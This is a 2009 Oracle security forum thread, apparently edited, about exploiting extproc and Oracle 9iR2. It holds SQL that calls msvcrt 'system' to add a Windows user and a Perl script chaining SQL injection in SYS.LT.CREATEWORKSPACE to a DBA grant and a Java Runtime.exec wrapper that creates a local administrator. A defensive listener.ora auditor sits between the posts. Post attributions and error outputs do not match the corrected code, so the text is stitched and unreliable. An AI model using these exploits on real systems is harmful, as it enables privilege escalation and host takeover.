Pete Finnigan's Oracle Security Forum (http://www.petefinnigan.com/forum/yabb/YaBB.cgi)
(Message started by: Pete Finnigan on May 23rd, 2009, 2:53pm)

Title: Exploite extproc
Post by Pete Finnigan on May 23rd, 2009, 2:53pm
Hi,
I am trying to test this vulnerability (extproc) but I have some problems:

First: I connect as scott/tiger
Second: I execute this code:


CREATE OR REPLACE LIBRARY exec_shell AS 'C:\WINDOWS\system32\msvcrt.dll';

CREATE OR REPLACE PROCEDURE oraexec (cmdstring IN CHAR)
IS EXTERNAL
NAME "system"
LIBRARY exec_shell
LANGUAGE C;
/

SQL> EXEC ORAEXEC('NET USER Mesli Mesli /ADD');

Output:
BEGIN ORAEXEC('NET USER Mesli Mesli /ADD'); END;
*
ERROR at line 1:
ORA-28595: Extproc agent : Invalid DLL Path
ORA-06512: at "SCOTT.ORAEXEC", line 0
ORA-06512: at line 1



I checked the DLL path, and C:\WINDOWS\system32\msvcrt.dll is correct.

I tried with the SYS user, but the same error occurs.

Please help me.

Title: Re: Exploite extproc
Post by Pete Finnigan on May 28th, 2009, 8:50am
Hi,

Thanks for your post. You don't say which version of Oracle you are on, but basically Oracle has added controls to prevent this from working. In earlier versions of Oracle you could do this; I am sure I have a version of this code somewhere on my site, probably against 8.1.7.

Oracle in 11g no longer enables extproc by default in the listener. In earlier versions Oracle added a check to make sure that the DLL loaded is in the $ORACLE_HOME/bin unless you have added parameters to allow it to run from elsewhere. The ENVS parameter of the listener.ora can be used to override this. The worst setting would be ENVS=EXTPROC_DLLS=ANY, which would give you an exploitable listener. The safest setting is to remove extproc completely; if it's used, then run the listener as a different user and specify EXTPROC_DLLS=ONLY and specify the path.

So I am guessing this doesn't work because of the version of Oracle that you are on.

Exploits are very time / version specific; that's not to say that you cannot find vulnerable systems still being used.

cheers

Pete
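
The reply above turns on one listener.ora setting: which DLLs the extproc agent is allowed to load. As an added example (not code from this thread), the script below parses a listener.ora, finds every SID_DESC whose PROGRAM is extproc, and reports whether its ENVS carries EXTPROC_DLLS=ANY (exploitable), EXTPROC_DLLS=ONLY:<path> (restricted), or nothing at all (vendor default, ORACLE_HOME bin/lib). The two listener.ora fragments embedded in it are constructed samples; the ORACLE_HOME, the DLL path and the SID names in them are assumptions, not values from the thread.

```python
"""Audit a listener.ora for extproc SID_DESC entries and their EXTPROC_DLLS policy.
Added example, not code from the thread; the paths and SID names are assumed."""
import re


class TnsParser:
    """Recursive-descent parser for Oracle's (KEY = VALUE) syntax: nested lists of (KEY, value)."""

    def __init__(self, text):
        # '#' starts a comment in listener.ora
        self.s = "\n".join(line.split("#", 1)[0] for line in text.splitlines())
        self.i = 0

    def peek(self):
        # skip whitespace and return the next character ('' at end of input)
        while self.i < len(self.s) and self.s[self.i].isspace():
            self.i += 1
        return self.s[self.i] if self.i < len(self.s) else ""

    def parse(self):
        entries = []
        while self.peek():
            entries.append(self.pair())
        return entries

    def pair(self):
        self.peek()
        m = re.match(r"[^\s()=]+", self.s[self.i:])
        if not m:
            raise ValueError("expected a key at offset %d" % self.i)
        key = m.group(0).upper()
        self.i += len(key)
        if self.peek() != "=":
            raise ValueError("expected '=' after %s" % key)
        self.i += 1
        if self.peek() == "(":  # one or more nested (K = V) groups
            children = []
            while self.peek() == "(":
                self.i += 1
                children.append(self.pair())
                if self.peek() != ")":
                    raise ValueError("missing ')' at offset %d" % self.i)
                self.i += 1
            return key, children
        if self.peek() == '"':  # quoted scalar, e.g. "EXTPROC_DLLS=ANY"
            end = self.s.index('"', self.i + 1)
            value, self.i = self.s[self.i + 1:end], end + 1
        else:  # bare scalar runs up to ')' or end of line
            m = re.match(r"[^)\r\n]*", self.s[self.i:])
            value, self.i = m.group(0).strip(), self.i + len(m.group(0))
        return key, value


def walk(entries):
    for key, value in entries:
        yield key, value
        if isinstance(value, list):
            yield from walk(value)


def audit_listener(text):
    """Return (sid_name, severity, reason) for every SID_DESC that runs extproc."""
    findings = []
    for key, value in walk(TnsParser(text).parse()):
        if key != "SID_DESC" or not isinstance(value, list):
            continue
        desc = {k: v for k, v in value if isinstance(v, str)}
        if desc.get("PROGRAM", "").lower() != "extproc":
            continue
        sid = desc.get("SID_NAME", "?")
        m = re.search(r"EXTPROC_DLLS\s*=\s*([^,]+)", desc.get("ENVS", ""), re.I)
        policy = m.group(1).strip() if m else ""
        if policy.upper() == "ANY":
            findings.append((sid, "CRITICAL", "EXTPROC_DLLS=ANY: any DLL on the host can be loaded"))
        elif policy.upper().startswith("ONLY:"):
            findings.append((sid, "OK", "loading restricted to " + policy[5:]))
        else:
            findings.append((sid, "REVIEW", "no ONLY restriction (EXTPROC_DLLS=%s); remove the SID_DESC if extproc is unused" % (policy or "default")))
    return findings


# Constructed samples, not real files: the weak setting from the reply above and the
# ONLY form with an assumed DLL path. The '#' comment is stripped by the parser.
WEAK_LISTENER_ORA = r"""
LISTENER = (DESCRIPTION_LIST = (DESCRIPTION = (ADDRESS = (PROTOCOL = IPC)(KEY = EXTPROC1))))
SID_LIST_LISTENER =
  (SID_LIST =
    (SID_DESC = (SID_NAME = PLSExtProc) (ORACLE_HOME = C:\oracle\ora92)
                (PROGRAM = extproc) (ENVS = "EXTPROC_DLLS=ANY"))
    (SID_DESC = (SID_NAME = orcl) (ORACLE_HOME = C:\oracle\ora92))  # plain database SID
  )
"""
HARDENED_LISTENER_ORA = r"""
SID_LIST_LISTENER =
  (SID_LIST =
    (SID_DESC = (SID_NAME = PLSExtProc) (ORACLE_HOME = C:\oracle\ora92) (PROGRAM = extproc)
                (ENVS = "EXTPROC_DLLS=ONLY:C:\oracle\ora92\bin\myextproc.dll"))
  )
"""

if __name__ == "__main__":
    for sid, severity, reason in audit_listener(WEAK_LISTENER_ORA) + audit_listener(HARDENED_LISTENER_ORA):
        print("%-9s %-12s %s" % (severity, sid, reason))
```

Run as is it scores the two samples; to check a real server, read its listener.ora into audit_listener. "OK" here means only what the reply says: the agent will load nothing but the listed DLLs. It does not check that the listener runs as a separate low-privileged account, which Pete lists as the other half of the safe configuration.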

Title: Re: Exploite extproc
Post by Pete Finnigan on Jun 18th, 2009, 9:51am
Hi,
Thanks Pete for your reply. I found another method (I use Java) to add both a system user and administrators. I tried to write a Perl script for this vulnerability, but there were some problems.
Code
use strict;
use warnings;
use DBI;
use DBD::Oracle;
use Getopt::Std;

my %opt;

sub usage {
    print <<"USAGE";

Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -U <system_user> -P <passw_user>

Options:
    -h     <host>          target server address
    -s     <sid>           target sid name
    -u     <user>          database user
    -p     <passwd>        database password
    -U     <system_user>   Windows account to create
    -P     <passw_user>    password for that account

USAGE
    exit 0;
}

# every option takes a value, so each letter needs a trailing colon
# (the original string 'h:s:u:p:U:P' left -P without one)
my $opt_string = 'h:s:u:p:U:P:';
getopts($opt_string, \%opt) or usage();
usage() if grep { !defined $opt{$_} } qw(h s u p U P);

my $user        = uc $opt{u};
my $system_user = $opt{U};
my $passw_user  = $opt{P};

# DBI->connect takes (dsn, user, password, \%attr): the two extra
# arguments in the original were taken as the attribute hash, which is
# what the "old-style syntax" and "HASH ref" errors at line 35 were about
my $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}",
    $opt{u}, $opt{p}, { RaiseError => 1, AutoCommit => 1 })
    or die "connect failed: $DBI::errstr";

# DBI sends one statement at a time, so the SQL*Plus script cannot be
# passed to $dbh->do as a whole: EXEC and the "/" terminator are SQL*Plus
# commands, not SQL. Each step is a single SQL statement or PL/SQL block.
my @steps = (
    # invoker-rights function that grants DBA; when SYS.LT calls it the
    # current user is SYS, so the grant succeeds
    qq{CREATE OR REPLACE FUNCTION Y RETURN VARCHAR2
       AUTHID CURRENT_USER AS
         PRAGMA AUTONOMOUS_TRANSACTION;
       BEGIN
         EXECUTE IMMEDIATE 'GRANT DBA TO $user';
         COMMIT;
         RETURN 'Y';
       END;},
    qq{BEGIN SYS.LT.CREATEWORKSPACE('sh2kerr'' and $user.Y()=''Y'); END;},
    qq{BEGIN SYS.LT.MERGEWORKSPACE('sh2kerr'' and $user.Y()=''Y'); END;},

    # Java permissions needed to spawn a process from inside the database
    qq{BEGIN dbms_java.grant_permission('$user', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'execute'); END;},
    qq{BEGIN dbms_java.grant_permission('$user', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', ''); END;},
    qq{BEGIN dbms_java.grant_permission('$user', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', ''); END;},

    # Java stored procedure wrapping Runtime.exec
    qq{CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVACMD" AS
       import java.lang.*;
       import java.io.*;
       public class JAVACMD {
         public static void execCommand(String command) throws IOException {
           Runtime.getRuntime().exec(command);
         }
       }},
    qq{CREATE OR REPLACE PROCEDURE JAVAEXEC (p_command IN VARCHAR2)
       AS LANGUAGE JAVA
       NAME 'JAVACMD.execCommand (java.lang.String)';},

    # OS commands run under the account the Oracle service runs as
    qq{BEGIN javaexec('net user $system_user $passw_user /add'); END;},
    qq{BEGIN javaexec('net localgroup Administrators $system_user /add'); END;},
);

$dbh->do($_) for @steps;

print "$system_user IS a system user\n";

$dbh->disconnect;

exit;

OUTPUT:
DBI->connect using 'old-style' syntax is deprecated and will be an error in future versions at Add_user.pl line 35
Can't use string ("1") as a HASH ref while "strict refs" in use at C:/Perl/lib/DBI.pm line 561.



Info:
1. I tried this with the account Scott, who is a DBA (SQL injection).
2. I tried the PL/SQL program and it works fine, but when I try to convert the PL/SQL file to Perl the preceding errors occur (system = Windows Server 2003, Oracle version: 9iR2).

thank you in advance.



